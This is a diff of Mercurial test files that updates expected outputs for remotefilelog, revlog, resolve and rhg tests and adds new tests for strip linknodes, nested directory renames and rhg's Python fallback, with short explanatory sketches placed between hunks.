- 4 files fetched over 2 fetches - (4 misses, 0.00% hit ratio) over *s (glob)
+ 3 files fetched over 2 fetches - (3 misses, 0.00% hit ratio) over *s (glob)
# unbundle
@@ -133,13 +133,14 @@
adding changesets
adding manifests
adding file changes
- added 1 changesets with 0 changes to 0 files
+ added 1 changesets with 3 changes to 3 files
new changesets 19edf50f4de7 (1 drafts)
(run 'hg update' to get a working copy)
+ 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ hg up
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
- 4 files fetched over 1 fetches - (4 misses, 0.00% hit ratio) over *s (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ cat a
a
@@ -148,7 +149,7 @@
$ clearcache
$ hg revert -r .~2 y z
no changes needed to z
- 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ hg checkout -C -r . -q
# explicit bundle should produce full bundle file
@@ -159,7 +160,7 @@
$ cd ..
$ hgcloneshallow ssh://user@dummy/master shallow2 -q
- 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
+ 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ cd shallow2
$ hg unbundle ../local.bundle
adding changesets
--- a/tests/test-remotefilelog-log.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-log.t Tue Apr 20 11:01:06 2021 -0400
@@ -30,6 +30,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-remotefilelog-partial-shallow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-partial-shallow.t Tue Apr 20 11:01:06 2021 -0400
@@ -18,8 +18,10 @@
$ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.includepattern=foo
streaming all changes
- 3 files to transfer, 336 bytes of data
- transferred 336 bytes in * seconds (*/sec) (glob)
+ 3 files to transfer, 336 bytes of data (no-zstd !)
+ transferred 336 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 3 files to transfer, 338 bytes of data (zstd !)
+ transferred 338 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cat >> shallow/.hg/hgrc <<EOF
--- a/tests/test-remotefilelog-prefetch.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-prefetch.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,8 +22,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow --noupdate
streaming all changes
- 2 files to transfer, 528 bytes of data
- transferred 528 bytes in * seconds (*/sec) (glob)
+ 2 files to transfer, 528 bytes of data (no-zstd !)
+ transferred 528 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 2 files to transfer, 532 bytes of data (zstd !)
+ transferred 532 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cd shallow
@@ -86,6 +88,7 @@
$ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc
$ hg strip tip
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/109c3a557a73-3f43405e-backup.hg (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ clearcache
$ hg pull
@@ -163,8 +166,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow2
streaming all changes
- 2 files to transfer, 528 bytes of data
- transferred 528 bytes in * seconds * (glob)
+ 2 files to transfer, 528 bytes of data (no-zstd !)
+ transferred 528 bytes in * seconds * (glob) (no-zstd !)
+ 2 files to transfer, 532 bytes of data (zstd !)
+ transferred 532 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -180,7 +185,7 @@
x: untracked file differs
3 files fetched over 1 fetches - (3 misses, 0.00% hit ratio) over * (glob)
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg revert --all
# Test batch fetching of lookup files during hg status
--- a/tests/test-remotefilelog-sparse.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-sparse.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,8 +22,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow --noupdate
streaming all changes
- 2 files to transfer, 527 bytes of data
- transferred 527 bytes in 0.* seconds (*/sec) (glob)
+ 2 files to transfer, 527 bytes of data (no-zstd !)
+ transferred 527 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 2 files to transfer, 534 bytes of data (zstd !)
+ transferred 534 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cd shallow
@@ -48,6 +50,7 @@
$ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc
$ hg strip tip
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/876b1317060d-b2e91d8d-backup.hg (glob)
+ 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ hg debugsparse --delete z
@@ -72,8 +75,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow2
streaming all changes
- 2 files to transfer, 527 bytes of data
- transferred 527 bytes in 0.* seconds (*) (glob)
+ 2 files to transfer, 527 bytes of data (no-zstd !)
+ transferred 527 bytes in * seconds (*) (glob) (no-zstd !)
+ 2 files to transfer, 534 bytes of data (zstd !)
+ transferred 534 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-remotefilelog-strip.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,68 @@
+#require no-windows
+
+ $ . "$TESTDIR/remotefilelog-library.sh"
+
+ $ hg init master
+ $ cd master
+ $ cat >> .hg/hgrc <<EOF
+ > [remotefilelog]
+ > server=True
+ > EOF
+ $ echo x > x
+ $ hg commit -qAm x
+
+ $ cd ..
+
+ $ hgcloneshallow ssh://user@dummy/master shallow -q
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
+ $ cd shallow
+
+ $ cat >> $TESTTMP/get_file_linknode.py <<EOF
+ > from mercurial import node, registrar, scmutil
+ > cmdtable = {}
+ > command = registrar.command(cmdtable)
+ > @command(b'debug-file-linknode', [(b'r', b'rev', b'.', b'rev')], b'hg debug-file-linknode FILE')
+ > def debug_file_linknode(ui, repo, file, **opts):
+ > rflctx = scmutil.revsingle(repo.unfiltered(), opts['rev']).filectx(file)
+ > ui.status(b'%s\n' % node.hex(rflctx.ancestormap()[rflctx._filenode][2]))
+ > EOF
+
+ $ cat >> .hg/hgrc <<EOF
+ > [ui]
+ > interactive=1
+ > [extensions]
+ > strip=
+ > get_file_linknode=$TESTTMP/get_file_linknode.py
+ > [experimental]
+ > evolution=createmarkers,allowunstable
+ > EOF
+ $ echo a > a
+ $ hg commit -qAm msg1
+ $ hg commit --amend 're:^$' -m msg2
+ $ hg commit --amend 're:^$' -m msg3
+ $ hg --hidden log -G -T '{rev} {node|short}'
+ @ 3 df91f74b871e
+ |
+ | x 2 70494d7ec5ef
+ |/
+ | x 1 1e423846dde0
+ |/
+ o 0 b292c1e3311f
+
+ $ hg debug-file-linknode -r 70494d a
+ df91f74b871e064c89afa1fe9e2f66afa2c125df
+ $ hg --hidden strip -r 1 3
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/df91f74b871e-c94d67be-backup.hg
+
+ $ hg --hidden log -G -T '{rev} {node|short}'
+ o 1 70494d7ec5ef
+ |
+ @ 0 b292c1e3311f
+
+Demonstrate that the linknode points to a commit that is actually in the repo
+after the strip operation. Otherwise remotefilelog has to search every commit in
+the repository looking for a valid linkrev every time it's queried, such as
+during push.
+ $ hg debug-file-linknode -r 70494d a
+ 70494d7ec5ef6cd3cd6939a9fd2812f9956bf553
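
A minimal sketch of the invariant exercised above, assuming the same internal
APIs the inline extension uses (scmutil.revsingle() and ancestormap() appear
in the test itself; changelog.hasnode() is standard revlog API):

    from mercurial import scmutil

    def linknode_is_valid(repo, file, rev=b'.'):
        # Resolve the file context the way debug-file-linknode does above.
        fctx = scmutil.revsingle(repo.unfiltered(), rev).filectx(file)
        # remotefilelog stores (p1, p2, linknode, copyfrom) per file node.
        linknode = fctx.ancestormap()[fctx._filenode][2]
        # After a strip, the linknode must still name a known changeset;
        # otherwise every query degenerates into a linear linkrev search.
        return repo.changelog.hasnode(linknode)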
--- a/tests/test-remotefilelog-tags.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-tags.t Tue Apr 20 11:01:06 2021 -0400
@@ -18,8 +18,10 @@
$ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.excludepattern=.hgtags
streaming all changes
- 3 files to transfer, 662 bytes of data
- transferred 662 bytes in * seconds (*/sec) (glob)
+ 3 files to transfer, 662 bytes of data (no-zstd !)
+ transferred 662 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 3 files to transfer, 665 bytes of data (zstd !)
+ transferred 665 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cat >> shallow/.hg/hgrc <<EOF
--- a/tests/test-rename-dir-merge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rename-dir-merge.t Tue Apr 20 11:01:06 2021 -0400
@@ -110,7 +110,7 @@
$ hg merge 2
b/c: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat b/c
target
but it should succeed if the content matches
@@ -294,3 +294,45 @@
M t/t
R a/s
R a/t
+
+ $ cd ..
+
+
+Test that files are moved to a new directory based on the longest matching
+path prefix: dir1/ below gets renamed to dir2/, and dir1/subdir1/ gets
+renamed to dir2/subdir2/. We want the new file dir1/subdir1/file5 to move to
+dir2/subdir2/ (not to dir2/subdir1/, as we would infer from the rename of
+dir1/ to dir2/ alone); a short sketch of this rule follows the test.
+
+ $ hg init nested-renames
+ $ cd nested-renames
+ $ mkdir dir1
+ $ echo a > dir1/file1
+ $ echo b > dir1/file2
+ $ mkdir dir1/subdir1
+ $ echo c > dir1/subdir1/file3
+ $ echo d > dir1/subdir1/file4
+ $ hg ci -Aqm initial
+ $ hg mv dir1 dir2
+ moving dir1/file1 to dir2/file1
+ moving dir1/file2 to dir2/file2
+ moving dir1/subdir1/file3 to dir2/subdir1/file3
+ moving dir1/subdir1/file4 to dir2/subdir1/file4
+ $ hg mv dir2/subdir1 dir2/subdir2
+ moving dir2/subdir1/file3 to dir2/subdir2/file3
+ moving dir2/subdir1/file4 to dir2/subdir2/file4
+ $ hg ci -m 'move dir1/ to dir2/ and dir1/subdir1/ to dir2/subdir2/'
+ $ hg co 0
+ 4 files updated, 0 files merged, 4 files removed, 0 files unresolved
+ $ echo e > dir1/subdir1/file5
+ $ hg ci -Aqm 'add file in dir1/subdir1/'
+ $ hg merge 1
+ 5 files updated, 0 files merged, 4 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg files
+ dir2/file1
+ dir2/file2
+ dir2/subdir2/file3
+ dir2/subdir2/file4
+ dir2/subdir2/file5
+ $ cd ..
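
The real heuristics live in Mercurial's merge code; the following is only a
self-contained sketch of the "longest matching prefix wins" rule shown above,
with every name hypothetical:

    def apply_dir_renames(path, renames):
        """Map path through directory renames, most specific prefix first.

        renames: dict of old directory prefix -> new directory prefix,
        e.g. {'dir1/': 'dir2/', 'dir1/subdir1/': 'dir2/subdir2/'}.
        """
        best = None
        for old, new in renames.items():
            if path.startswith(old) and (best is None or len(old) > len(best[0])):
                best = (old, new)
        return best[1] + path[len(best[0]):] if best else path

    renames = {'dir1/': 'dir2/', 'dir1/subdir1/': 'dir2/subdir2/'}
    # file5 follows dir1/subdir1/ -> dir2/subdir2/, not merely dir1/ -> dir2/
    assert apply_dir_renames('dir1/subdir1/file5', renames) == 'dir2/subdir2/file5'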
--- a/tests/test-repo-compengines.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-repo-compengines.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,11 +1,19 @@
A new repository uses zlib storage, which doesn't need a requirement
+ $ cat << EOF >> $HGRCPATH
+ > [format]
+ > # stabilize the test across variants
+ > revlog-compression=zlib
+ > EOF
+
+
$ hg init default
$ cd default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -54,6 +62,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -72,6 +81,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd
revlogv1
sparserevlog
@@ -175,6 +185,7 @@
exp-compression-none
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
--- a/tests/test-requires.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-requires.t Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,7 @@
$ hg commit -m test
$ rm .hg/requires
$ hg tip
- abort: unknown version (2) in revlog 00changelog.i
+ abort: unknown version (65535) in revlog 00changelog.i
[50]
$ echo indoor-pool > .hg/requires
$ hg tip
@@ -53,6 +53,8 @@
featuresetup-test
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-resolve.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-resolve.t Tue Apr 20 11:01:06 2021 -0400
@@ -153,15 +153,15 @@
$ hg up 0
abort: outstanding merge conflicts
(use 'hg resolve' to resolve)
- [255]
+ [20]
$ hg merge 2
abort: outstanding merge conflicts
(use 'hg resolve' to resolve)
- [255]
+ [20]
$ hg merge --force 2
abort: outstanding merge conflicts
(use 'hg resolve' to resolve)
- [255]
+ [20]
set up conflict-free merge
@@ -255,11 +255,13 @@
ancestor path: file1 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd)
other path: file1 (node 6f4310b00b9a147241b071a60c28a650827fb03d)
extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523, flags "")
ancestor path: file2 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd)
other path: file2 (node 6f4310b00b9a147241b071a60c28a650827fb03d)
extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac
+ extra: merged = yes
$ hg resolve -l
R file1
U file2
@@ -271,7 +273,7 @@
{
"commits": [{"label": "working copy", "name": "local", "node": "57653b9f834a4493f7240b0681efcb9ae7cab745"}, {"label": "merge rev", "name": "other", "node": "dc77451844e37f03f5c559e3b8529b2b48d381d1"}],
"extras": [],
- "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}]
+ "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}]
}
]
@@ -344,6 +346,24 @@
$ hg resolve -l
R file1
R file2
+Test with :mergediff conflict markers
+ $ hg resolve --unmark
+ $ hg resolve --re-merge -t :mergediff file2
+ merging file2
+ warning: conflicts while merging file2! (edit, then use 'hg resolve --mark')
+ [1]
+ $ hg resolve -l
+ U file1
+ U file2
+ $ hg --config commands.resolve.mark-check=abort resolve -m
+ warning: the following files still have conflict markers:
+ file2
+ abort: conflict markers detected
+ (use --all to mark anyway)
+ [20]
+ $ hg resolve -l
+ U file1
+ U file2
Test option value 'warn'
$ hg resolve --unmark
$ hg resolve -l
--- a/tests/test-revlog-raw.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revlog-raw.py Tue Apr 20 11:01:06 2021 -0400
@@ -51,10 +51,10 @@
def readprocessor(self, rawtext):
# True: the returned text could be used to verify hash
text = rawtext[len(_extheader) :].replace(b'i', b'1')
- return text, True, {}
+ return text, True
-def writeprocessor(self, text, sidedata):
+def writeprocessor(self, text):
# False: the returned rawtext shouldn't be used to verify hash
rawtext = _extheader + text.replace(b'1', b'i')
return rawtext, False
@@ -147,6 +147,7 @@
b'flags': rlog.flags(r),
b'deltabase': rlog.node(deltaparent),
b'delta': rlog.revdiff(deltaparent, r),
+ b'sidedata': rlog.sidedata(r),
}
def deltaiter(self):
@@ -159,10 +160,11 @@
deltabase = chunkdata[b'deltabase']
delta = chunkdata[b'delta']
flags = chunkdata[b'flags']
+ sidedata = chunkdata[b'sidedata']
chain = node
- yield (node, p1, p2, cs, deltabase, delta, flags)
+ yield (node, p1, p2, cs, deltabase, delta, flags, sidedata)
def linkmap(lnode):
return rlog.rev(lnode)
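
After this change the delta tuples gain sidedata as an eighth field. A hedged
sketch of a conforming producer, built only from revlog accessors the test
itself calls (deltaparent, revdiff, flags, sidedata):

    def deltas(rlog, revs, linknode):
        # Yield 8-tuples in the shape consumed by the updated deltaiter().
        for r in revs:
            dp = rlog.deltaparent(r)
            p1, p2 = rlog.parentrevs(r)
            yield (rlog.node(r), rlog.node(p1), rlog.node(p2), linknode,
                   rlog.node(dp), rlog.revdiff(dp, r),
                   rlog.flags(r), rlog.sidedata(r))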
@@ -293,7 +295,7 @@
# Verify text, rawtext, and rawsize
if isext:
- rawtext = writeprocessor(None, text, {})[0]
+ rawtext = writeprocessor(None, text)[0]
else:
rawtext = text
if rlog.rawsize(rev) != len(rawtext):
--- a/tests/test-revlog-v2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revlog-v2.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,8 +22,10 @@
$ cd empty-repo
$ cat .hg/requires
dotencode
- exp-revlogv2.1
+ exp-revlogv2.2
fncache
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
sparserevlog
store
--- a/tests/test-revlog.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revlog.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,10 +22,10 @@
Unknown version is rejected
>>> with open('.hg/store/00changelog.i', 'wb') as fh:
- ... fh.write(b'\x00\x00\x00\x02') and None
+ ... fh.write(b'\x00\x00\xbe\xef') and None
$ hg log
- abort: unknown version (2) in revlog 00changelog.i
+ abort: unknown version (48879) in revlog 00changelog.i
[50]
$ cd ..
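
Both new numbers fall out of the revlog index header, whose first four bytes
pack sixteen bits of flags and sixteen bits of version. A quick check of the
values, assuming only that layout:

    import struct

    header = struct.unpack('>I', b'\x00\x00\xbe\xef')[0]
    assert header & 0xFFFF == 48879   # 0xbeef, as 'hg log' reports above
    assert 0xFFFF == 65535            # the value test-requires.t now expects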
--- a/tests/test-revset.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revset.t Tue Apr 20 11:01:06 2021 -0400
@@ -3108,3 +3108,18 @@
$ log 'expectsize(0:2, :2)'
abort: revset size mismatch. expected between 0 and 2, got 3
[255]
+
+Test getting list of node from file
+
+ $ hg log -r '0:2' -T '{node}\n' > some.nodes
+ $ hg log -r 'nodefromfile("some.nodes")' -T '{rev}\n'
+ 0
+ 1
+ 2
+ $ hg log -r 'nodefromfile("missing-file")' -T '{rev}\n'
+ abort: cannot open nodes file "missing-file": $ENOENT$
+ [255]
+ $ echo bad-node > bad.nodes
+ $ hg log -r 'nodefromfile("bad.nodes")' -T '{rev}\n'
+ $ echo abcdefabcdefabcdeabcdeabcdeabcdeabcdeabc > missing.nodes
+
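A rough sketch of the parsing behavior the test relies on, with hypothetical
helper names; per the output above, malformed or unknown nodes are skipped
silently, while a missing file aborts:

    from mercurial.node import bin

    def nodes_from_file(repo, path):
        with open(path, 'rb') as fh:           # missing file -> abort upstream
            for line in fh:
                try:
                    n = bin(line.strip())      # malformed hex is skipped
                except (TypeError, ValueError):
                    continue
                if repo.changelog.hasnode(n):  # unknown nodes are skipped too
                    yield repo.changelog.rev(n)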
--- a/tests/test-rhg.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rhg.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,43 +1,50 @@
-#require rust
+#require rhg
-Define an rhg function that will only run if rhg exists
- $ rhg() {
- > if [ -f "$RUNTESTDIR/../rust/target/release/rhg" ]; then
- > "$RUNTESTDIR/../rust/target/release/rhg" "$@"
- > else
- > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg."
- > exit 80
- > fi
- > }
+ $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort"
Unimplemented command
- $ rhg unimplemented-command
- error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context
+ $ $NO_FALLBACK rhg unimplemented-command
+ unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context
USAGE:
- rhg <SUBCOMMAND>
+ rhg [OPTIONS] <SUBCOMMAND>
For more information try --help
+
+ [252]
+ $ rhg unimplemented-command --config rhg.on-unsupported=abort-silent
[252]
Finding root
- $ rhg root
+ $ $NO_FALLBACK rhg root
abort: no repository found in '$TESTTMP' (.hg not found)!
[255]
$ hg init repository
$ cd repository
- $ rhg root
+ $ $NO_FALLBACK rhg root
$TESTTMP/repository
+Reading and setting configuration
+ $ echo "[ui]" >> $HGRCPATH
+ $ echo "username = user1" >> $HGRCPATH
+ $ $NO_FALLBACK rhg config ui.username
+ user1
+ $ echo "[ui]" >> .hg/hgrc
+ $ echo "username = user2" >> .hg/hgrc
+ $ $NO_FALLBACK rhg config ui.username
+ user2
+ $ $NO_FALLBACK rhg --config ui.username=user3 config ui.username
+ user3
+
Unwritable file descriptor
- $ rhg root > /dev/full
+ $ $NO_FALLBACK rhg root > /dev/full
abort: No space left on device (os error 28)
[255]
Deleted repository
$ rm -rf `pwd`
- $ rhg root
+ $ $NO_FALLBACK rhg root
abort: error getting current working directory: $ENOENT$
[255]
@@ -52,7 +59,7 @@
> hg commit -m "commit $i" -q
Listing tracked files from root
- $ rhg files
+ $ $NO_FALLBACK rhg files
file1
file2
file3
@@ -60,13 +67,13 @@
Listing tracked files from subdirectory
$ mkdir -p path/to/directory
$ cd path/to/directory
- $ rhg files
+ $ $NO_FALLBACK rhg files
../../../file1
../../../file2
../../../file3
Listing tracked files through broken pipe
- $ rhg files | head -n 1
+ $ $NO_FALLBACK rhg files | head -n 1
../../../file1
Debugging data in inline index
@@ -79,20 +86,20 @@
> hg add file-$i
> hg commit -m "Commit $i" -q
> done
- $ rhg debugdata -c 2
+ $ $NO_FALLBACK rhg debugdata -c 2
8d0267cb034247ebfa5ee58ce59e22e57a492297
test
0 0
file-3
Commit 3 (no-eol)
- $ rhg debugdata -m 2
+ $ $NO_FALLBACK rhg debugdata -m 2
file-1\x00b8e02f6433738021a065f94175c7cd23db5f05be (esc)
file-2\x005d9299349fc01ddd25d0070d149b124d8f10411e (esc)
file-3\x002661d26c649684b482d10f91960cc3db683c38b4 (esc)
Debugging with full node id
- $ rhg debugdata -c `hg log -r 0 -T '{node}'`
+ $ $NO_FALLBACK rhg debugdata -c `hg log -r 0 -T '{node}'`
d1d1c679d3053e8926061b6f45ca52009f011e3f
test
0 0
@@ -108,16 +115,16 @@
cf8b83f14ead62b374b6e91a0e9303b85dfd9ed7
91c6f6e73e39318534dc415ea4e8a09c99cd74d6
6ae9681c6d30389694d8701faf24b583cf3ccafe
- $ rhg files -r cf8b83
+ $ $NO_FALLBACK rhg files -r cf8b83
file-1
file-2
file-3
- $ rhg cat -r cf8b83 file-2
+ $ $NO_FALLBACK rhg cat -r cf8b83 file-2
2
- $ rhg cat -r c file-2
- abort: ambiguous revision identifier c
+ $ $NO_FALLBACK rhg cat -r c file-2
+ abort: ambiguous revision identifier: c
[255]
- $ rhg cat -r d file-2
+ $ $NO_FALLBACK rhg cat -r d file-2
2
Cat files
@@ -128,50 +135,77 @@
$ echo "original content" > original
$ hg add original
$ hg commit -m "add original" original
- $ rhg cat -r 0 original
+ $ $NO_FALLBACK rhg cat -r 0 original
original content
Cat copied file should not display copy metadata
$ hg copy original copy_of_original
$ hg commit -m "add copy of original"
- $ rhg cat -r 1 copy_of_original
+ $ $NO_FALLBACK rhg cat -r 1 copy_of_original
+ original content
+
+Fallback to Python
+ $ $NO_FALLBACK rhg cat original
+ unsupported feature: `rhg cat` without `--rev` / `-r`
+ [252]
+ $ rhg cat original
original content
+ $ FALLBACK_EXE="$RHG_FALLBACK_EXECUTABLE"
+ $ unset RHG_FALLBACK_EXECUTABLE
+ $ rhg cat original
+ abort: 'rhg.on-unsupported=fallback' without 'rhg.fallback-executable' set.
+ [255]
+ $ RHG_FALLBACK_EXECUTABLE="$FALLBACK_EXE"
+ $ export RHG_FALLBACK_EXECUTABLE
+
+ $ rhg cat original --config rhg.fallback-executable=false
+ [1]
+
+ $ rhg cat original --config rhg.fallback-executable=hg-non-existent
+ tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$
+ unsupported feature: `rhg cat` without `--rev` / `-r`
+ [252]
+
+ $ rhg cat original --config rhg.fallback-executable=rhg
+ Blocking recursive fallback. The 'rhg.fallback-executable = rhg' config points to `rhg` itself.
+ unsupported feature: `rhg cat` without `--rev` / `-r`
+ [252]
+
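rhg itself is written in Rust; the following Python pseudocode is only a
sketch of the fallback policy the tests above exercise, reusing the config
names and exit codes they show:

    import os, sys

    def handle_unsupported(config, argv):
        mode = config.get('rhg.on-unsupported', 'fallback')
        if mode == 'abort-silent':
            sys.exit(252)                      # exit code only, no message
        if mode == 'abort':
            sys.stderr.write('unsupported feature: ...\n')
            sys.exit(252)
        # fallback: hand the whole command line over to a full Mercurial
        exe = config.get('rhg.fallback-executable') or os.environ.get(
            'RHG_FALLBACK_EXECUTABLE')
        if not exe:
            sys.stderr.write("abort: 'rhg.on-unsupported=fallback' without "
                             "'rhg.fallback-executable' set.\n")
            sys.exit(255)
        if os.path.basename(exe) == 'rhg':
            sys.stderr.write('Blocking recursive fallback.\n')
            sys.exit(252)
        os.execvp(exe, [exe] + argv)           # ENOENT is reported if missing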
Requirements
- $ rhg debugrequirements
+ $ $NO_FALLBACK rhg debugrequirements
dotencode
fncache
generaldelta
+ persistent-nodemap
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
$ echo indoor-pool >> .hg/requires
- $ rhg files
+ $ $NO_FALLBACK rhg files
+ unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool
[252]
- $ rhg cat -r 1 copy_of_original
+ $ $NO_FALLBACK rhg cat -r 1 copy_of_original
+ unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool
[252]
- $ rhg debugrequirements
- dotencode
- fncache
- generaldelta
- revlogv1
- sparserevlog
- store
- indoor-pool
+ $ $NO_FALLBACK rhg debugrequirements
+ unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool
+ [252]
$ echo -e '\xFF' >> .hg/requires
- $ rhg debugrequirements
- abort: .hg/requires is corrupted
+ $ $NO_FALLBACK rhg debugrequirements
+ abort: parse error in 'requires' file
[255]
Persistent nodemap
$ cd $TESTTMP
$ rm -rf repository
- $ hg init repository
+ $ hg --config format.use-persistent-nodemap=no init repository
$ cd repository
- $ rhg debugrequirements | grep nodemap
+ $ $NO_FALLBACK rhg debugrequirements | grep nodemap
[1]
$ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn"
$ hg id -r tip
@@ -179,14 +213,14 @@
$ ls .hg/store/00changelog*
.hg/store/00changelog.d
.hg/store/00changelog.i
- $ rhg files -r c3ae8dec9fad
+ $ $NO_FALLBACK rhg files -r c3ae8dec9fad
of
$ cd $TESTTMP
$ rm -rf repository
$ hg --config format.use-persistent-nodemap=True init repository
$ cd repository
- $ rhg debugrequirements | grep nodemap
+ $ $NO_FALLBACK rhg debugrequirements | grep nodemap
persistent-nodemap
$ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn"
$ hg id -r tip
@@ -198,7 +232,78 @@
.hg/store/00changelog.n
Specifying revisions by changeset ID
- $ rhg files -r c3ae8dec9fad
+ $ $NO_FALLBACK rhg files -r c3ae8dec9fad
of
- $ rhg cat -r c3ae8dec9fad of
+ $ $NO_FALLBACK rhg cat -r c3ae8dec9fad of
r5000
+
+Create a shared repository
+
